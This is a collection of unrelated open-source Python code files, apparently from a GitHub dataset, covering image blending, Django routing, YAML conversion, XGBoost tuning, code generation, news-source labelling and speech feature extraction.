Laplacian pyramid\n :param A: image on the left\n :param B: image on the right\n :param mask: mask [0, 1]\n :return blended_image: same size as input image\n Tips: use cs4243_gauss_pyramid() & cs4243_lap_pyramid() to help you\n \"\"\"\n kernel = cs4243_gaussian_kernel(7, 1)\n blended_image = None\n \n # ============= Your code here ============= #\n def reconstruct_lap_pyramid(lap_pyramid, kernel):\n # Scale kernel to compensate the 0s in the image after upsampling\n kernel = kernel * 4.0\n image = lap_pyramid[0]\n for i in range(1, len(lap_pyramid)):\n temp_image = cs4243_upsample(image, 2)\n temp_image = cs4243_filter_faster(temp_image, kernel)\n image = temp_image + lap_pyramid[i]\n return image\n \n la = cs4243_lap_pyramid(cs4243_gauss_pyramid(A))\n lb = cs4243_lap_pyramid(cs4243_gauss_pyramid(B))\n gr = list(reversed(cs4243_gauss_pyramid(mask)))\n \n lap_blended = []\n for a, b, ra in zip(la, lb, gr):\n blended = ra * a + (1.0 - ra) * b\n lap_blended.append(blended)\n\n blended_image = reconstruct_lap_pyramid(lap_blended, kernel)\n # ========================================= #\n \n return blended_image","repo_name":"alloystory/cs4243","sub_path":"Lab 1/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":16354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36802052724","text":"\"\"\"day24_myself URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. 
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom app01 import views\n\nurlpatterns = [\n url(r'^$', views.login),\n url(r'^index/$', views.index),\n url(r'^login/$', views.login),\n url(r'^reg/$', views.reg),\n url(r'^logout_v/$', views.logout_v),\n url(r'^admin/', admin.site.urls),\n\n url(r'^hosts/$', views.hosts),\n url(r'^hosts/add/$', views.hosts_add),\n url(r'^hosts/edit/(\\d+)/$', views.edit_host),\n url(r'^hosts/del/(\\d+)/$', views.delete_host),\n\n url(r'^users/$', views.users),\n url(r'^users/add/$', views.users_add),\n url(r'^users/del/(\\d+)/$', views.users_del),\n url(r'^users/edit/(\\d+)/$', views.users_edit),\n\n url(r'^test/$', views.test),\n]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"shengleqi/day24_myself","sub_path":"day24_myself/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35645939138","text":"# -*- coding: utf-8 -*-\nfrom os.path import splitext\nimport argparse\nimport yaml\nimport json\nfrom tabular.tabular import Tabular, MarkdownTabular, AsciiDocTabular\n\n\ndef set_config(args):\n tabular_cls = Tabular\n file_name = args.yml_file\n name, ext = splitext(file_name)\n out_ext = '.txt'\n if args.markdown:\n tabular_cls = MarkdownTabular\n out_ext = '.md'\n if args.asciidoc:\n tabular_cls = AsciiDocTabular\n out_ext = '.adoc'\n if args.csv:\n tabular_cls = Tabular\n out_ext = '.csv'\n\n file_parser = yaml\n if args.json or ext == 'json':\n file_parser = json\n output = args.output\n if not output:\n output = name + out_ext\n table_name = args.tablename\n if not table_name:\n table_name = name\n return file_name, file_parser, tabular_cls, output, table_name\n\n\ndef run(args):\n file_name, file_parser, tabular_cls, output, table_name = set_config(args)\n with open(file_name, 'r') as yml_file:\n data = file_parser.load(yml_file)\n t = tabular_cls.from_dict(data, table_name=table_name)\n result = t.render()\n with open(output, 'w') as out:\n out.write(result)\n print('output into {}'.format(output))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='convert yaml file into tabular text(csv, markdown, AsciiDoc)')\n parser.add_argument('yml_file', help='target yaml file to convert')\n parser.add_argument('-o', '--output',\n help='output file name. 
If no designation, replace file extension following table style')\n parser.add_argument('-t', '--tablename', help='set table name (default: file name base)')\n parser.add_argument('-j', '--json', action='store_true', default=0, help='json file convert mode')\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-md', '--markdown', action='store_true', default=1, help='as markdown style')\n group.add_argument('-ad', '--asciidoc', action='store_true', default=0, help='as AsciiDoc style')\n group.add_argument('--csv', action='store_true', default=0, help='as csv style')\n\n run(parser.parse_args())","repo_name":"ta-dadadada/yamltotable","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4847090800","text":"import os\nfrom typing import List\n\nfrom setuptools import find_packages, setup\n\nimport versioneer\n\nPATH_ROOT = os.path.dirname(__file__)\n\n\ndef _load_requirements(path_dir: str, file_name: str) -> List[str]:\n with open(os.path.join(path_dir, file_name), \"r\") as file:\n lines = [ln.strip() for ln in file.readlines()]\n reqs = list()\n for line in lines:\n if line.startswith(\"#\"):\n continue\n else:\n reqs.append(line)\n return reqs\n\n\nsetup(\n name=\"washing-learning\",\n version=versioneer.get_version(),\n cmdclass=versioneer.get_cmdclass(),\n author=\"Lucas Robinet\",\n author_email=\"lucas.robinet@yahoo.com\",\n description=\"Machine Learning Toolbox\",\n long_description=open(\"README.md\", \"r\").read(),\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/Lucas-rbnt/washing-learning\",\n license=\"Apache-2.0\",\n packages=find_packages(exclude=[\"examples\", \"examples.*\", \"tests\", \"tests.*\"]),\n install_requires=_load_requirements(\n path_dir=os.path.join(PATH_ROOT), file_name=\"requirements.txt\"\n ),\n extras_requires={\n \"dev\": _load_requirements(\n path_dir=os.path.join(PATH_ROOT), file_name=\"requirements-dev.txt\"\n ),\n \"doc\": _load_requirements(\n path_dir=os.path.join(PATH_ROOT), file_name=\"requirements-doc.txt\"\n ),\n },\n)\n","repo_name":"Lucas-rbnt/washing-learning","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17815524265","text":"import turtle\n\ndef draw_shapes():\n\n # Setting a window with the background colored red\n window = turtle.Screen()\n window.bgcolor('red')\n\n # Move a turtle named brad forward\n brad = turtle.Turtle()\n\n # Customize the turtle\n brad.shape(\"turtle\")\n brad.color('yellow')\n brad.speed(2)\n\n # Turn Brad right 90 degrees and move forward x 4\n for i in range(4):\n brad.forward(100)\n brad.right(90)\n\n # Add another turtle named angie\n angie = turtle.Turtle()\n\n # Customize angie\n angie.shape(name='arrow')\n angie.color('blue')\n\n # angie, draw a circle\n angie.circle(100)\n\n # Add the third turtle named charles\n charles = turtle.Turtle()\n\n # Customize charles\n charles.shape(name='turtle')\n charles.color('green')\n\n # charles, draw a triangle\n for i in range(3):\n charles.back(100)\n charles.right(120)\n\n 
window.exitonclick()\n\ndraw_shapes()\n","repo_name":"chukycheese/udacity_courses","sub_path":"programming_foundations_with_python/3_use_classes_draw_turtles/11_improving_code_quality.py","file_name":"11_improving_code_quality.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8580705846","text":"\ndef isPandigital(n):\n return set(str(n)) == set('0123456789')\n\ndef solve(n):\n count = 0\n def _solve(x, d, m):\n nonlocal count\n if m == 0:\n if isPandigital(x):\n count += 1\n else:\n if d == 0:\n _solve(10*x + 1, 1, m-1)\n elif d == 9:\n _solve(10*x + 8, 8, m-1)\n else:\n _solve(10*x + d-1, d-1, m-1)\n _solve(10*x + d+1, d+1, m-1)\n for i in range(1, 10):\n _solve(i, i, n-1)\n return count\n\nfor i in range(10, 25):\n print('i=' + str(i) + ', ' + str(solve(i)))\n \n","repo_name":"tyama711/competitive","sub_path":"ProjectEuler/Problem178/p178.py","file_name":"p178.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14817029693","text":"import cv2\nimport numpy as np\n\n\ndef nichika(img, th=128):\n ind0 = np.where(img < th)\n ind1 = np.where(img >= th)\n img[ind0] = 0\n img[ind1] = 1\n\n return img\n\ndef Renketsu(img):\n Ver, Hor = img.shape\n img = np.pad(img, ([1, 1], [1, 1]), 'edge')\n result = np.zeros((Ver+1, Hor+1, 3))\n\n for x in range(1, Hor+1):\n for y in range(1, Ver+1):\n if img[y, x] != 0:\n s1 = img[y, x+1] - (img[y, x+1] * img[y-1, x+1] * img[y-1, x])\n s2 = img[y-1, x] - (img[y-1, x] * img[y-1, x-1] * img[y, x-1])\n s3 = img[y, x-1] - (img[y, x-1] * img[y+1, x-1] * img[y+1, x])\n s4 = img[y+1, x] - (img[y+1, x] * img[y+1, x+1] * img[y, x+1])\n S = s1 + s2 + s3 + s4\n\n if S == 0:\n result[y,x] = [0, 0, 255]\n elif S == 1:\n result[y,x] = [0, 255, 0]\n elif S == 2:\n result[y,x] = [255, 0, 0]\n elif S == 3:\n result[y,x] = [255, 255, 0]\n elif S == 4:\n result[y,x] = [255, 0, 255]\n\n return result[1:1+Ver, 1:1+Hor]\n\n\nimg = cv2.imread(\"../renketsu.png\", cv2.IMREAD_GRAYSCALE)\nimg = nichika(img, 1)\nresult = Renketsu(img)\n\ncv2.imwrite(\"myans_61.png\", result)\ncv2.imshow(\"result\", result)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n","repo_name":"OverHall27/Gasyori100knock","sub_path":"Question_61_70/myanswers/myans61.py","file_name":"myans61.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28143295175","text":"from xgboost import XGBClassifier\nimport pandas as pd\nfrom sklearn.grid_search import GridSearchCV\nimport time\n\nt_start = time.time()\n\nX_train = pd.read_csv(\"X_train.csv\").drop(columns=[\"Unnamed: 0\",\"index\"], axis=1)\ny_train = pd.read_csv(\"y_train.csv\").drop(columns=[\"Unnamed: 0\",\"id\"], axis=1).target.values\n\n\nparameters = {'min_child_weight': [5, 10],\n 'gamma': [0.01, .1,1],\n 'subsample': [0.8,1],\n 'colsample_bytree': [0.6, 0.8],\n 'max_depth': [3, 5, 7]\n }\n\nparameters = {'learning_rate':[0.02],\n 'min_child_weight': [5],\n 'gamma': [30],\n 'subsample': [0.6],\n 'colsample_bytree': [0.6],\n 'max_depth': [6],\n 'n_estimators':[1000]\n }\n\n\n\nxgbc = XGBClassifier(objective='binary:logistic',\n silent=True, verbose=True, scale_pos_weight=8)# 'scale_pos_weight' to set as the ratio for skewed data\n\nclf_xgbc=GridSearchCV(estimator=xgbc,param_grid=parameters, scoring='roc_auc', cv=3, 
n_jobs=1,verbose=100)\n\nclf_xgbc.fit(X_train, y_train)\n\n\nprint(\"Best parameters are {}\".format(clf_xgbc.best_params_))\nprint(\"Best score is {}\".format(clf_xgbc.best_score_))\n\n\nt_end = time.time()\nprint(\"It took {} seconds to run this test\".format(t_end-t_start))","repo_name":"amnghd/Uber_Driver_Prediction_Challenge","sub_path":"utility functions/xgboost_hypertunner.py","file_name":"xgboost_hypertunner.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5838842647","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"Demo\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nprocess.load(\"Geometry.MuonCommonData.muonIdealGeometryXML_cfi\")\nprocess.load(\"Geometry.RPCGeometry.rpcGeometry_cfi\")\nprocess.load(\"Geometry.MuonNumbering.muonNumberingInitialization_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(\n 'file:/tmp/carrillo/kktau300GeVx1000WithRPC.root'\n )\n)\n\nprocess.demo = cms.EDAnalyzer('TrackRPC',\n tracks = cms.untracked.string('standAloneMuons'),\n partLabel = cms.untracked.string(\"genParticles\"),\n rootFileName = cms.untracked.string('/tmp/carrillo/hscp.root'),\n\n)\n\n\nprocess.p = cms.Path(process.demo)\n","repo_name":"camilocarrillo/UserCode","sub_path":"TrackRPC/trackrpc_cfg.py","file_name":"trackrpc_cfg.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19819878240","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nfrom ..codegen import Codegen, SIGNED_SOURCE\nfrom ..types import DynamicArrayType\nfrom .type_converter import TypeConverter\n\n\nclass CppEntryStructsCodegen(Codegen):\n def __init__(self, entries):\n super(CppEntryStructsCodegen, self).__init__()\n\n # Keep only one example of each unique typename\n self.unique_types = {x.memory_format.typename: x.memory_format for x in entries}\n\n def preferred_filename(self):\n return \"Entry.h\"\n\n def generate(self):\n template = \"\"\"\n// %%SIGNED_SOURCE%%\n\n#include \n#include \n#include \n#include \n#include \n\n#pragma once\n\nnamespace facebook {\nnamespace profilo {\nnamespace entries {\n\n%%ENTRIES_STRUCTS%%\n\nuint8_t peek_type(const void* src, size_t len);\n\n} // namespace entries\n} // namespace profilo\n} // namespace facebook\n\"\"\".lstrip()\n\n enum = self._generate_entries_structs()\n template = template.replace(\"%%ENTRIES_STRUCTS%%\", enum)\n template = template.replace(\"%%SIGNED_SOURCE%%\", SIGNED_SOURCE)\n return template\n\n def _generate_entries_structs(self):\n\n structs = [\n self._generate_entry_struct(fmt) for fmt in list(self.unique_types.values())\n ]\n\n structs = \"\\n\".join(structs)\n\n return structs\n\n def _generate_entry_struct(self, fmt):\n template = \"\"\"\nstruct __attribute__((packed)) %%TYPENAME%% {\n\n static const uint8_t kSerializationType = %%TYPE_ID%%;\n\n%%FIELDS%%\n\n static void pack(const %%TYPENAME%%& entry, void* dst, size_t size);\n static void unpack(%%TYPENAME%%& entry, const void* src, size_t size);\n\n static size_t calculateSize(%%TYPENAME%% const& entry);\n};\n\"\"\".lstrip()\n\n fields = [\n TypeConverter.get(field[1]).generate_declaration(name=field[0])\n for field in fmt.fields\n ]\n fields = \"\\n\".join(fields)\n fields = 
Codegen.indent(fields)\n\n template = template.replace(\"%%TYPENAME%%\", fmt.typename)\n template = template.replace(\"%%TYPE_ID%%\", str(fmt.type_id))\n template = template.replace(\"%%FIELDS%%\", fields)\n\n return template\n\n template = template.replace(\"%%TYPENAME%%\", fmt.typename)\n\n\nclass CppEntryStructsCppCodegen(Codegen):\n def __init__(self, entries):\n super(CppEntryStructsCppCodegen, self).__init__()\n\n # Keep only one example of each unique typename\n self.unique_types = {x.memory_format.typename: x.memory_format for x in entries}\n\n def preferred_filename(self):\n return \"Entry.cpp\"\n\n def generate(self):\n template = \"\"\"\n// %%SIGNED_SOURCE%%\n\n#include \n#include \n#include \n\nnamespace facebook {\nnamespace profilo {\nnamespace entries {\n\n%%ENTRIES_CODE%%\n\nuint8_t peek_type(const void* src, size_t len) {\n const uint8_t* src_byte = reinterpret_cast(src);\n return *src_byte;\n}\n\n} // namespace entries\n} // namespace profilo\n} // namespace facebook\n\"\"\".lstrip()\n\n code = self._generate_entries_code()\n template = template.replace(\"%%ENTRIES_CODE%%\", code)\n template = template.replace(\"%%SIGNED_SOURCE%%\", SIGNED_SOURCE)\n return template\n\n def _generate_entries_code(self):\n\n structs = [\n self._generate_entry_struct(fmt) for fmt in list(self.unique_types.values())\n ]\n\n structs = \"\\n\".join(structs)\n\n return structs\n\n def _generate_entry_struct(self, fmt):\n template = \"\"\"\n%%PACKCODE%%\n\n%%UNPACKCODE%%\n\n%%CALCULATESIZECODE%%\n\"\"\".lstrip()\n\n pack_code = self._generate_pack_code(fmt)\n unpack_code = self._generate_unpack_code(fmt)\n calcsize_code = self._generate_calcsize_code(fmt)\n\n template = template.replace(\"%%PACKCODE%%\", pack_code)\n template = template.replace(\"%%UNPACKCODE%%\", unpack_code)\n template = template.replace(\"%%CALCULATESIZECODE%%\", calcsize_code)\n\n return template\n\n def _generate_pack_code(self, fmt):\n template = \"\"\"\n/* Alignment requirement: dst must be 4-byte aligned. */\nvoid %%TYPENAME%%::pack(const %%TYPENAME%%& entry, void* dst, size_t size) {\n if (size < %%TYPENAME%%::calculateSize(entry)) {\n throw std::out_of_range(\"Cannot fit %%TYPENAME%% in destination\");\n }\n if (dst == nullptr) {\n throw std::invalid_argument(\"dst == nullptr\");\n }\n uint8_t* dst_byte = reinterpret_cast(dst);\n *dst_byte = kSerializationType;\n size_t offset = 1;\n\n%%MEMCOPIES%%\n}\n\"\"\".lstrip()\n\n memcopies = []\n for idx, (name, ftype) in enumerate(fmt.fields):\n\n if isinstance(ftype, DynamicArrayType) and idx != len(fmt.fields) - 1:\n # HACK: figure out how to propagate dynamic offsets in the\n # packing/unpacking code\n raise ValueError(\n \"DynamicArrayType entries are only allowed\" \" as the last member\"\n )\n\n memcpy = TypeConverter.get(ftype).generate_pack_code(\n from_expression=\"entry.{name}\".format(name=name),\n to_expression=\"dst_byte\",\n offset_expr=\"offset\",\n )\n memcopies.append(memcpy)\n memcopies = \"\\n\".join(memcopies)\n memcopies = Codegen.indent(memcopies)\n\n template = template.replace(\"%%TYPENAME%%\", fmt.typename)\n template = template.replace(\"%%MEMCOPIES%%\", memcopies)\n return template\n\n def _generate_unpack_code(self, fmt):\n template = \"\"\"\n/* Alignment requirement: src must be 4-byte aligned. 
*/\nvoid %%TYPENAME%%::unpack(%%TYPENAME%%& entry, const void* src, size_t size) {\n if (src == nullptr) {\n throw std::invalid_argument(\"src == nullptr\");\n }\n const uint8_t* src_byte = reinterpret_cast(src);\n if (*src_byte != kSerializationType) {\n throw std::invalid_argument(\"Serialization type is incorrect\");\n }\n size_t offset = 1;\n%%MEMCOPIES%%\n}\n\"\"\".lstrip()\n\n memcopies = []\n for name, ftype in fmt.fields:\n memcpy = TypeConverter.get(ftype).generate_unpack_code(\n from_expression=\"src_byte\",\n to_expression=\"entry.{name}\".format(name=name),\n offset_expr=\"offset\",\n )\n memcopies.append(memcpy)\n memcopies = \"\\n\".join(memcopies)\n\n memcopies = Codegen.indent(memcopies)\n\n template = template.replace(\"%%TYPENAME%%\", fmt.typename)\n template = template.replace(\"%%MEMCOPIES%%\", memcopies)\n return template\n\n def _generate_calcsize_code(self, fmt):\n template = \"\"\"\nsize_t %%TYPENAME%%::calculateSize(%%TYPENAME%% const& entry) {\n size_t offset = 1 /*serialization format*/;\n%%EXPRESSIONS%%\n return offset;\n}\n\"\"\".lstrip()\n\n expressions = [\n TypeConverter.get(ftype).generate_runtime_size_code(\n \"entry\",\n fname,\n \"offset\",\n )\n for fname, ftype in fmt.fields\n ]\n expressions = \"\\n\".join(expressions)\n expressions = Codegen.indent(expressions)\n\n template = template.replace(\"%%TYPENAME%%\", fmt.typename)\n template = template.replace(\"%%EXPRESSIONS%%\", expressions)\n return template\n","repo_name":"facebookarchive/profilo","sub_path":"cpp/codegen/cpp/entry_structs.py","file_name":"entry_structs.py","file_ext":"py","file_size_in_byte":7315,"program_lang":"python","lang":"en","doc_type":"code","stars":1576,"dataset":"github-code","pt":"53"} +{"seq_id":"23079345856","text":"import pymysql\nfrom datetime import datetime\nfrom collections import defaultdict\n\nsql_dict = {\n 'host': '10.10.180.145',\n 'user': 'hourong',\n 'password': 'hourong',\n 'charset': 'utf8',\n 'db': 'IP'\n}\n\ncount_dict = defaultdict(list)\nint_split = 30\nif __name__ == '__main__':\n _count = 0\n conn = pymysql.connect(**sql_dict)\n with conn as cursor:\n # IP\n # cursor.execute('''SELECT\n # ip_address,\n # group_concat(u_time ORDER by u_time)\n # FROM ip_used\n # GROUP BY ip_address''')\n # local proxy\n cursor.execute('''SELECT\n local_proxy,\n group_concat(u_time ORDER by u_time)\n FROM ip_used\n GROUP BY local_proxy''')\n for line in cursor.fetchall():\n _count += 1\n if _count % 10000 == 0:\n print(_count)\n ip, times = line\n time_list = times.decode().split(',')\n if len(time_list) == 1:\n count_dict[-1].append(ip)\n\n else:\n for i in range(len(time_list) - 1):\n try:\n last = datetime.strptime(time_list[i + 1], '%Y-%m-%d %X')\n first = datetime.strptime(time_list[i], '%Y-%m-%d %X')\n except Exception:\n continue\n\n res = (last - first).seconds // 60\n\n count_dict[res // int_split].append(ip)\n\n # print(count_dict)\n x_data = []\n y_data = []\n for k in sorted(count_dict.keys()):\n v = count_dict[k]\n if k == -1:\n print('1 times', len(v))\n x_data.append('一次')\n y_data.append(len(v))\n else:\n print(str(30 * k) + ' - ' + str(30 + 30 * k), len(v))\n x_data.append(str(30 * k) + ' - ' + str(30 + 30 * k))\n y_data.append(len(v))\n conn.close()\n print(x_data)\n print(y_data)\n","repo_name":"20113261/p_m","sub_path":"IP_report/ip_report.py","file_name":"ip_report.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"4237528731","text":"#################### Select news sources #################### \nimport pandas as pd \nimport numpy as np\nimport os\n\ndata_preparation_path = os.path.join(os.path.dirname(os.path.abspath(__file__)))\nos.chdir(data_preparation_path)\n\nlabels = pd.read_csv('labels.csv')\n\nlabels.rename(columns={'Unnamed: 0': 'Source'}, inplace=True)\n\n# Removing German articles of Spiegel\nlabels.drop(index=np.array(labels.index)[labels['Source']=='Spiegel'], inplace=True)\nlabels.reset_index(drop=True, inplace=True)\n\n\nunwanted_columns = ['NewsGuard, Does not repeatedly publish false content',\n 'NewsGuard, Gathers and presents information responsibly',\n 'NewsGuard, Regularly corrects or clarifies errors',\n 'NewsGuard, Handles the difference between news and opinion responsibly',\n 'NewsGuard, Avoids deceptive headlines',\n 'NewsGuard, Website discloses ownership and financing',\n 'NewsGuard, Clearly labels advertising',\n \"NewsGuard, Reveals who's in charge, including any possible conflicts of interest\",\n 'NewsGuard, Provides information about content creators',\n 'NewsGuard, score',\n 'NewsGuard, overall_class',\n 'Pew Research Center, known_by_40%',\n 'Pew Research Center, total',\n 'Pew Research Center, consistently_liberal',\n 'Pew Research Center, mostly_liberal',\n 'Pew Research Center, mixed',\n 'Pew Research Center, mostly conservative',\n 'Pew Research Center, consistently conservative',\n 'Wikipedia, is_fake',\n 'Open Sources, reliable',\n 'Open Sources, fake',\n 'Open Sources, unreliable',\n 'Open Sources, bias',\n 'Open Sources, conspiracy',\n 'Open Sources, hate',\n 'Open Sources, junksci',\n 'Open Sources, rumor',\n 'Open Sources, blog',\n 'Open Sources, clickbait',\n 'Open Sources, political',\n 'Open Sources, satire',\n 'Open Sources, state',\n 'PolitiFact, Pants on Fire!',\n 'PolitiFact, False',\n 'PolitiFact, Mostly False',\n 'PolitiFact, Half-True',\n 'PolitiFact, Mostly True',\n 'PolitiFact, True']\n# 'BuzzFeed, leaning'\nlabels_wanted = labels.drop(unwanted_columns, axis=1)\n\n# buzzfeed news source count\nnum_buzzfeed_outlets = np.invert(pd.isna(labels_wanted['BuzzFeed, leaning'])).sum()\n\n##### Allsides Dataset (chosen) ###############################################\n\n# labeled lean left\nallsides_lean_left = list(labels_wanted['Source']\n [labels_wanted['Allsides, bias_rating']=='Lean Left'])\n# labeled lean right\nallsides_lean_right = list(labels_wanted['Source']\n [labels_wanted['Allsides, bias_rating']=='Lean Right'])\n# labeled: center\nallsides_center = list(labels_wanted['Source']\n [labels_wanted['Allsides, bias_rating']=='Center'])\n# labeled: right\nallsides_right = list(labels_wanted['Source']\n [labels_wanted['Allsides, bias_rating']=='Right'])\n# labeled: left\nallsides_left = list(labels_wanted['Source']\n [labels_wanted['Allsides, bias_rating']=='Left'])\n\nallsides_sources = allsides_center + allsides_lean_left + allsides_lean_right \\\n + allsides_left + allsides_right\nallsides_bias_labels = len(allsides_center) * ['Center'] \\\n + len(allsides_lean_left) * ['Lean Left'] \\\n + len(allsides_lean_right) * ['Lean Right'] \\\n + len(allsides_left) * ['Left'] \\\n + len(allsides_right) * ['Right']\n\n\nnum_allsides_outlets = len(allsides_bias_labels)\n\n# saving to csv\nallsides_sources_with_labels = pd.DataFrame({'Source': allsides_sources,\n 'bias':allsides_bias_labels})\n\nallsides_sources_with_labels.to_csv(os.path.join('allsides_data', 'allsides_bias_labels.csv'), index=False)\n\n\n##### MediaBias/FactCheck dataset 
(disregarded) ###################################\n\n# labeled: least biased\nmbfc_least_biased = list(labels_wanted['Source']\n [labels_wanted['Media Bias / Fact Check, label']\n =='least_biased'])\n# labeled: left bias\nmbfc_left_bias = list(labels_wanted['Source']\n [labels_wanted['Media Bias / Fact Check, label']\n =='left_bias'])\n# labeled: right bias\nmbfc_right_bias = list(labels_wanted['Source']\n [labels_wanted['Media Bias / Fact Check, label']\n =='right_bias'])\n# labeled: left center bias\nmbfc_left_center_bias = list(labels_wanted['Source']\n [labels_wanted['Media Bias / Fact Check, label']\n =='left_center_bias'])\n# labeled: right center bias\nmbfc_right_center_bias = list(labels_wanted['Source']\n [labels_wanted['Media Bias / Fact Check, label']\n =='right_center_bias'])\n# variable: extreme left\nmbfc_extreme_left = list(labels_wanted.dropna(subset=['Media Bias / Fact Check, right'])\n [labels_wanted.dropna(subset=['Media Bias / Fact Check, right'])\n ['Media Bias / Fact Check, extreme_left']==1]['Source'])\n# variable: extreme right\nmbfc_extreme_right = list(labels_wanted.dropna(subset=['Media Bias / Fact Check, right'])\n [labels_wanted.dropna(subset=['Media Bias / Fact Check, right'])\n ['Media Bias / Fact Check, extreme_right']==1]['Source'])\n\nmbfc_sources = mbfc_least_biased + mbfc_left_bias + mbfc_right_bias \\\n + mbfc_left_center_bias + mbfc_right_center_bias \\\n + mbfc_extreme_left + mbfc_extreme_right\n\nmbfc_bias_labels = len(mbfc_least_biased) * ['least_biased'] \\\n + len(mbfc_left_bias) * ['left_bias'] \\\n + len(mbfc_right_bias) * ['right_bias'] \\\n + len(mbfc_left_center_bias) * ['left_center_bias'] \\\n + len(mbfc_right_center_bias) * ['right_center_bias'] \\\n + len(mbfc_extreme_left) * ['extreme_left'] \\\n + len(mbfc_extreme_right) * ['extreme_right'] \n\nnum_mbfc_outlets = len(mbfc_bias_labels)\n\nmbfc_sources_with_labels = pd.DataFrame({'Source': mbfc_sources,\n 'bias':mbfc_bias_labels})\n# saving to csv\nmbfc_sources_with_labels.to_csv('mbfc_full/mbfc_full_for_counting_bias_labels.csv', index=False)\n\n\n##### SQL commands ################################################################\n#############################################\nsql_sources = allsides_sources # mbfc_sources\n#############################################\nsql_string = 'DELETE FROM articles WHERE '\nfor i,source in enumerate(mbfc_sources):\n if i != len(mbfc_sources) -1:\n sql_string +='NOT source=' + \"'\" + source + \"'\"+ ' AND '\n else: \n sql_string +='NOT source=' + \"'\" + source + \"'\"\n\nprint(sql_string)\n","repo_name":"Tobias-K93/media-bias-prediction","sub_path":"data_preparation/0_select_news_sources.py","file_name":"0_select_news_sources.py","file_ext":"py","file_size_in_byte":6649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27696098817","text":"# -*- coding: utf-8 -*-\n\n\"\"\" Created on 9:21 AM 11/30/18\n @author: ngunhuconchocon\n @brief: This script is made to construct frame-wise dictionary between src and tar spectra\n For short, it create dicts of exemplars ( a_i, b_i pairs)\n\"\"\"\n\nfrom __future__ import print_function\nfrom tqdm import tqdm\n\nfrom utils import config_get_config, logdir, io_read_speaker_data, io_save_to_disk\n\nimport pickle\nimport configparser\n\nimport os\nimport pdb\n\nimport librosa as lbr\nimport pysptk\nfrom dtw import dtw\nfrom fastdtw import fastdtw\n# from dtaidistance.dtw import distance_fast, best_path, best_path2, warping_paths\nfrom librosa import 
display\n\nimport pyworld as pw\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# for debugging\nimport logging\nimport cProfile\nimport datetime\nimport itertools\nimport time\n\nfrom multiprocessing import Pool, cpu_count\n\n\nlogging.basicConfig(\n filename=\"logs/\" + \":\".join(str(datetime.datetime.now()).split(\":\")[:-1]),\n level=logging.DEBUG,\n format='%(asctime)s %(levelname)s %(module)s - %(funcName)s: %(message)s',\n datefmt=\"%Y-%m-%d %H:%M:%S\"\n)\n\ntry:\n import coloredlogs\n coloredlogs.install(level=logging.DEBUG, fmt='%(asctime)s %(levelname)s %(module)s - %(funcName)s: %(message)s')\nexcept ModuleNotFoundError:\n pass\n\n# parse the configuration\nargs = config_get_config(\"config/config\")\n\nframe_length = int(args['feat_frame_length'])\noverlap = float(args['feat_overlap'])\n# hop_length = int(frame_length * overlap) + 300\nhop_length = int(args['feat_hop_length'])\norder = int(args['feat_order'])\nalpha = float(args['feat_alpha'])\ngamma = float(args['feat_gamma'])\n\ndata_path = args['DataPath']\nspeakerA = args['SpeakerA']\nspeakerB = args['SpeakerB']\nfeature_path = args['feature_path']\nsr = int(args['sampling_rate'])\n\nf0_floor = int(args['f0_floor'])\n\ncpu_rate = float(args['cpu_rate'])\nnb_file = int(args['nb_file'])\n\n# frame_length = pw.get_cheaptrick_fft_size(sr, f0_floor)\n# frame_length = pw.get_cheaptrick_fft_size(sr, f0_floor)\n\nlogging.info(\"{}% cpu resources ({} cores) will be used to run this script\".format(cpu_rate * 100, int(cpu_rate * cpu_count())))\nlogging.info(\"START EXTRACTING ...\")\n\n\n# This is wrong (as we need MCEP, not MFCC). Nevertheless, preserving this is necessary.\n# Updated 2018 Dec 14: Edit feat_mfccs to 